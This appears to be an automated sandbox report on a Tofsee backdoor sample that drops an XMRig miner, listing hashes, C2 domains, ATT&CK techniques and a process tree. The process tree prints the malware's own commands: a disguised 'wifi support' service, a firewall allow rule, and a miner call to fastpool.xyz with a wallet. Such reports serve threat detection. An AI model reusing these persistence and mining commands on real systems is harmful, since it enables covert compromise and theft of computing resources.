Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-03-2023 21:53

General

  • Target

    file.exe

  • Size

    265KB

  • MD5

    cd8743aa91752e2e02571b2fe3a1c27b

  • SHA1

    3ba45028288170cfa3f137f5ce8924f0fbf6d36f

  • SHA256

    e3c7793b26883da4922c5bc91a769b0c1345badc04c967e5f89177aaf8364ea7

  • SHA512

    903cf7987825b983fcb7b87ef2900c61dbb5e92ded53191839be2ddf68cf09849fdd7399ae10766d9e5d1f5aa89dd1d4e32f6024e96bd7dac3645c5939017274

  • SSDEEP

    3072:FzSyRHyNFTsVxLZfLOAFGCluuTqoJUR1d5rFIjRu4xDYFLdBL5kMpDCU3wsUf2:9P5yNmVxLt4KmoaR1d5ralfxDYRSMp

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ysnwilmp\
      2⤵
        PID:792
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\twtmdfzp.exe" C:\Windows\SysWOW64\ysnwilmp\
        2⤵
          PID:616
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ysnwilmp binPath= "C:\Windows\SysWOW64\ysnwilmp\twtmdfzp.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3884
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description ysnwilmp "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1844
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start ysnwilmp
          2⤵
          • Launches sc.exe
          PID:1956
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4144
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 1044
          2⤵
          • Program crash
          PID:4628
      • C:\Windows\SysWOW64\ysnwilmp\twtmdfzp.exe
        C:\Windows\SysWOW64\ysnwilmp\twtmdfzp.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:260
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3708
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1644
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 260 -s 512
          2⤵
          • Program crash
          PID:3692
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2552 -ip 2552
        1⤵
          PID:3148
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 260 -ip 260
          1⤵
            PID:4376

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\twtmdfzp.exe
            Filesize

            14.7MB

            MD5

            41baf6b62b959478fd40797035c72dae

            SHA1

            14ebbaafbfef4f243caea0953566cccf46b0a872

            SHA256

            07ca5fe82555308b4cc8dd5991f2e7550fd6df8cd53bd1ed9a640cd6accbdb03

            SHA512

            3510d25a0a638e53234467b163128777ad9ef914ce552e1dff84005a957494e647dd6712e928887e6f80f998dc9d28d06a0f77be4b09be98baf07181a8a10117

          • C:\Windows\SysWOW64\ysnwilmp\twtmdfzp.exe
            Filesize

            14.7MB

            MD5

            41baf6b62b959478fd40797035c72dae

            SHA1

            14ebbaafbfef4f243caea0953566cccf46b0a872

            SHA256

            07ca5fe82555308b4cc8dd5991f2e7550fd6df8cd53bd1ed9a640cd6accbdb03

            SHA512

            3510d25a0a638e53234467b163128777ad9ef914ce552e1dff84005a957494e647dd6712e928887e6f80f998dc9d28d06a0f77be4b09be98baf07181a8a10117

          • memory/260-145-0x0000000000400000-0x0000000000705000-memory.dmp
            Filesize

            3.0MB

          • memory/1644-195-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/1644-198-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/1644-199-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/1644-197-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/1644-196-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/1644-194-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/1644-193-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/1644-188-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/2552-138-0x0000000000400000-0x0000000000705000-memory.dmp
            Filesize

            3.0MB

          • memory/2552-135-0x00000000007D0000-0x00000000007E3000-memory.dmp
            Filesize

            76KB

          • memory/3708-167-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-173-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-160-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-161-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-162-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-163-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-164-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-168-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-169-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-156-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-166-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-165-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-170-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-171-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-172-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-159-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-174-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-175-0x0000000003110000-0x0000000003120000-memory.dmp
            Filesize

            64KB

          • memory/3708-176-0x00000000033E0000-0x00000000033E5000-memory.dmp
            Filesize

            20KB

          • memory/3708-179-0x00000000033E0000-0x00000000033E5000-memory.dmp
            Filesize

            20KB

          • memory/3708-180-0x0000000007E00000-0x000000000820B000-memory.dmp
            Filesize

            4.0MB

          • memory/3708-183-0x0000000007E00000-0x000000000820B000-memory.dmp
            Filesize

            4.0MB

          • memory/3708-184-0x00000000033F0000-0x00000000033F7000-memory.dmp
            Filesize

            28KB

          • memory/3708-153-0x00000000025F0000-0x00000000025F6000-memory.dmp
            Filesize

            24KB

          • memory/3708-152-0x0000000002E00000-0x000000000300F000-memory.dmp
            Filesize

            2.1MB

          • memory/3708-149-0x0000000002E00000-0x000000000300F000-memory.dmp
            Filesize

            2.1MB

          • memory/3708-148-0x0000000001280000-0x0000000001295000-memory.dmp
            Filesize

            84KB

          • memory/3708-146-0x0000000001280000-0x0000000001295000-memory.dmp
            Filesize

            84KB

          • memory/3708-144-0x0000000001280000-0x0000000001295000-memory.dmp
            Filesize

            84KB

          • memory/3708-143-0x0000000001280000-0x0000000001295000-memory.dmp
            Filesize

            84KB

          • memory/3708-140-0x0000000001280000-0x0000000001295000-memory.dmp
            Filesize

            84KB